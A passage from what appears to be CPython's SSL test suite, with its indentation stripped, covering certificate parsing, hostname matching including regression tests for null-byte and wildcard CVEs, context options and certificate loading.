cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
